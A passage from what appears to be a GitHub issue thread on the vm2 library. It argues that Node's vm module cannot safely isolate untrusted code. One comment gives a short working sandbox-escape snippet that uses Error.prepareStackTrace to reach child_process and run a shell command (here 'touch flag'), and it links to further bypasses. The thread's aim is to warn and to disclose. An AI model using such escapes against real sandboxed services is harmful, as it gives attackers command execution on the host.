mgttt closed this 5 months ago
That's just the stock node vm 🤔 vm2 did a lot more to prevent escapes but it still wasn't enough
bypass:
```js
Error.prepareStackTrace = (e, frames) => {
  frames.constructor
    .constructor("return process")()
    .mainModule.require("child_process")
    .execSync("touch flag");
};
throw new Error();
```
Please don't rely on a few patches or node's vm in general for dealing with untrusted code, it gives a false sense of security and there are countless other ways to bypass (e.g. https://gist.github.com/leesh3288/e4aa7b90417b0b0ac7bcd5b09ac7d3bd)
That's why the readme says

> Consider migrating your code to isolated-vm.
Your solution does not help, as @j4k0xb showed again and again. Stop asking here what problems your solution still has. It has nothing to do with vm2. Move this discussion over to your own repo.
[content removed for the very unfriendly management]